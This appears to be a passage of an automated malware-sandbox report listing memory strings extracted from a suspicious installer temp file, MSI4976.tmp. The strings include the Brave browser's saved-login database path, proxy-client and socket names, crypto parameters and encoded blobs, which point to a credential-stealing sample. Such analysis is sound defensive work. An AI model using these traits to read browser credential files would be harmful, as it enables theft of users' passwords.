              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfhmemstr_fd2c0922-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?"*]mmemstr_040d8b2f-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?=*^mmemstr_1bce6ac7-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c<?+pmemstr_80b8ac18-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlf@8memstr_fdd33c3d-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?8*smmemstr_1c2abf67-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ocalhmemstr_c1b1af92-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?;*tmmemstr_14732ab3-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v3epick323l227301938l22memstr_c938f03d-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 02006l227301938l227301943l0memstr_46a70c2f-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7301922l227301943l22730200hmemstr_635b906f-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301925l227301923l227301memstr_e40e2a9a-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6l227301926l227301946l2273memstr_00644912-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 951l227301939l227301938l22memstr_fa9207da-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 02006l227301922l227301945lmemstr_7b6f098a-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 944l227301941l227301memstr_0504caa4-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 01951l227301945l227301944l227302008dmemstr_6dc913de-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301908l227301941l227301924l227301935l227301926l227301922l227302008l227301938l227301946l227301946l227302006l227301925l227301923l227301941l227301941l227301939l227301925l227301925l227301936l227301923l227301946l227301946l227301935l227302006l227301941l227301946l227301945l227301925l227301939l227301938lmemstr_caa44c36-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301891l227301944l227301943l227301940l227301946l227301939l227302006l227301922l227301945l227302006l227301923l227301925l227301939l227302006l227301922l227301950l227301939l227302006l227301906l227301914l227301914l227302006l227301936l227301951l227301946l227301939l227302008hmemstr_42972969-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301908l227301943l227301938l227302006l227301944l227301923l227301947l227301940l227301939l227301924l227302006l227301945l227301936l227302006l227301926l227301943l227301924l227301943l227301947l227301939l227301922l227301939l227301924l227301925l227302008227302memstr_9e922063-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\bravesoftware\brave-browser\user data\default\login datapmemstr_caa897e2-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301904l227301923l227301944l227301941l227301922l227301951l227301945l227301944l227302006l227301944l227301945l227301922l227302006l227301936l227301945l227301923l227301944l227301938l227302006l227301951l227301944l227302006l227301922l227301950l227301939l227302006l227301906l227301914l227301914l227302006l227301936l227301951l227301946l227301939l227302008dmemstr_a7d20fd4-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301891l227301944l227301924l227301939l227301941l227301945l227301937l227301944l227301951l227301932l227301939l227301938l227302006l227301939l227301924l227301924l227301945l227301924l227302008l227302006l227302006l227301910l227301939l227301924l227301924l227301945l227301924l227302006l227301995l227302006hmemstr_fb702f9c-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301891l227301944l227301943l227301940l227301946l227301939l227302006l227301922l227301945l227302006l227301945l227301926l227301939l227301944l227302006l227301908l227301941l227301924l227301935l227301926l227301922l227302008l227301938l227301946l227301946hmemstr_e21a78a1-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301890l227301950l227301939l227302006l227301945l227301940l227301948l227301939l227301941l227301922l227302006l227301921l227301943l227301925l227302006l227301944l227301945l227301922l227302006l227301936l227301945l227301923l227301944l227301938l227302008227302memstr_e9ab050c-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 01945l227301926l227301939l227301944l227301939l227301938xmemstr_ca62fdf2-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227302011l227302006l227301908l227301941l227301924l227301935l227301926l227301922l227302008l227301938l227301946l227301946l227302006l227301925l227301923l227301941l227301941l227301939l227301925l227301925l227301936l227301923l227301946l227301946l227301935l227302006l227301945l227301926l227301939l227301944l227301939l227301938bmemstr_3885e64c-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301890l227301950l227301939l227302006l227301924l227301939l227301927l227301923l227301939l227301925l227301922l227302006l227301951l227301925l227302006l227301944l227301945l227301922l227302006l227301925l227301923l227301926l227301926l227301945l227301924l227301922l227301939l227301938l227302008227301-memstr_dcfcdd93-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301904l227301923l227301944l227301941l227301922l227301951l227301945l227301944l227301996l227302006l227301897l227301897l227301909l227301924l227301935l227301926l227301922l227301945l227301912l227301905l227301897l227301919l227301925l227301911l227301923l227301922l227301950l227301890l227301943l227301937l227301908l227301951l227301922l227301914l227301939l227301944l227301937l227301922l227301950l227301888l227301943l227301946l227301951l227301938l227302014l227302015memstr_7cc6af57-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 12fymemstr_11a0d6b7-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p5my8jc3h5zr7oy3memstr_25948e88-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m1bt9lw3i`3memstr_e44f4425-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p9ht7kd6xi7dk3(x#memstr_f8ddc6d3-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p7hf7od5z5t7or3#x$memstr_5dc6f8df-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p5hb2ta0k6gu3:x%memstr_05dfb1a5-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r2pa9en3a3i|3=x&memstr_4f5784f7-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n0ci4az8q8gmemstr_784c853a-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r8wu0wb7mj5xmemstr_3694f42d-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __sqlite_consolewritememstr_f0e3bfcf-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p6np8eb3sc5fmemstr_a5520cd3-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m4kt0iy6m#3memstr_713a0836-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p5uw8dj3c*3kx,memstr_54d7c105-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o6lb6yf1n8v-3bx-memstr_2d360f03-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m1bt9lw3i43ex.memstr_d90e0e00-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b2cy9kd5e+memstr_25d99e99-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p3oi9ui3mk7tmemstr_71165750-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m1bt9lw3imemstr_7ec8612a-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p1at9xx4lmemstr_e08e838a-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: proxyclient_start5tmemstr_3b4330f5-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p2zr8dc1vp8xmemstr_73501ecd-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function: y5tv9un9j()memstr_f6aaa62b-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p5ih3zq8ei8cmemstr_6f45b59e-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\installermemstr_4e82578f-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dzqknadnup2ke3ig9pv8vmemstr_276f2153-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9zk9nn7xh8gmemstr_39d9febe-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g3wp1ah7cy5xmemstr_c519b5f3-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: des_112-ad66-4c7c-9a1@lmemstr_0bb26a6b-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b7zo6od4sklmemstr_004cfd4a-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e7dz3cb8irlmemstr_daeb14c0-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o1xt0kv5xulmemstr_63be3238-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blocklengthh;byte for\lmemstr_b8dc4e19-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r2be1nc2uglmemstr_b6b60205-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blocksizelistnl/[hmemstr_44665349-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodecbcql&[imemstr_c77c3538-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodecfb;long txl9[jmemstr_033a740f-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p1er6rp3gx3imemstr_c4058e1d-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n0ug5lm5wmemstr_c89511d1-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodegcmu6li8ymemstr_57c409aa-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o1ik5ah0rw9smemstr_624974b8-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dsaparametershort data&lmemstr_22fc1c1e-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: effectivekeylength)ln[qmemstr_706b395a-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: authtaglength0la[rmemstr_f4298205-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hashblocklengththrw9s;lx[smemstr_e867cf35-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p0lw5at1rm6amemstr_b317cd51-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodeccmmemstr_c07762d0-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodeecb52d-9cdmemstr_b0665f7a-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmoden/amemstr_060cd258-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p8pp8ir2zp7imemstr_1b082406-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m2sz5ny4ji5nmemstr_29ee8aea-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmode-44ee-8ebmemstr_e3d1909f-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e5au3zc6li8ymemstr_1c6c92ab-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9en5oh1hd2pmemstr_e1bcfffa-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dhparameters/amemstr_2fcc6fd2-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b4iq9rt1imemstr_67c1c1f0-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b3cw2ka3om5umemstr_b7c9657e-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n4ig4rn1rz4fnl1bw1wr8fmemstr_25b54667-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b8bk4fh8lmemstr_2782f02f-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.1.1.1memstr_df0ae5e5-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r6fo9tl5io0omemstr_959cbd57-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: paddingschemesmemstr_f3a73792-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p0da2gt1vr5i5ymemstr_1566fe06-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r7nh0so6mmemstr_23cf23ce-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hashdigestlengthgmmemstr_449e15fb-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hashoidlistngthnmmemstr_5a4c0fb6-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: multiobjectlengthmemstr_b14e653c-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p6xv7fb1xxmmemstr_d9dc1050-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2rn5bg2fcmmemstr_0d3326fe-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.2memstr_f1fb937d-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.2jm+zlmemstr_230e370c-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: keyobjectlengthmm"zmmemstr_83c413cb-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: objectlengthngthtm%znmemstr_fe1fb6ec-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivhoidlistmemstr_a5e1f45a-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: signaturelengthmemstr_36013538-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: keystrengthgthmemstr_06a8824b-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p9nx7mp1qi0dmemstr_ed15d38c-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: messageblocklength"mmemstr_357dfd41-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b1zf1ly0pro%mjzumemstr_8c663227-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.7memstr_5e604cd2-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.7,mmzvmemstr_40f78c81-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.4memstr_b273f178-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.47mdzwmemstr_2bd09f64-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p6um5xu5b>mmemstr_3bca5b98-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: keylengthsmemstr_9a9ef538-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g0gi4kn5no9cmemstr_bde83e14-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o6qr5jz0je5ymemstr_6b1c3406-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m4bj7sj5kw2ymemstr_d9a1f4dc-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g4zb9jw9lmemstr_261c27f9-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r2qe4ez1qx7nmemstr_5b4286e8-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p5ic4cs7hm8xmemstr_1a8d4c2a-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p4fx2uw4vmemstr_628e176c-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m3dd0gb0smemstr_33f8b327-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int tv_sec;int tv_usecmemstr_5bec7564-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fd_arraymemstr_5c72391d-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9bv5pl0fn4omemstr_d2ac80c8-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p5fu2fk5je4smemstr_10bac416-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g6ki3tt6vmemstr_337e543f-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e8du3sr9gt9qmemstr_13ebfe78-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: long length;ptr pbdatamemstr_3c76eb12-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e3ow0va7omemstr_b55d1ff3-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p9pp4ck1ho0kcnmemstr_2f528baf-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9kh8nt0vjnmemstr_369992d7-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2bl1vk1qmnmemstr_717c0b5c-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n7it7cl2ea3xfttnmemstr_562fd02d-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __wsafdissetmemstr_37375dd7-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windatafnmemstr_cce92ceb-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fd_countocal\bravesofin.]memstr_3016ee3f-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b9nz5or8lmemstr_43a4b844-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m0uy7nm6omemstr_fe61199d-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m6jr9mp3po3vmemstr_d2003848-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o1zk1ck5py8lmemstr_deaa5b7b-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9oj8dy3etmemstr_832ee4a5-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g0dq2od8ra7u!nmemstr_23ea0979-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p5vg0vy8e(ni]memstr_c7ced69e-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b8hw6xb6j:n{]memstr_056fc2eb-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p4hc9xr3bb8p=nr]memstr_38c5f135-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g0pr3vq7wmemstr_7db0ec9c-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p5vn8bh9re9tmemstr_fa4fd915-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b7ns2it6t\cmemstr_d67234f3-c
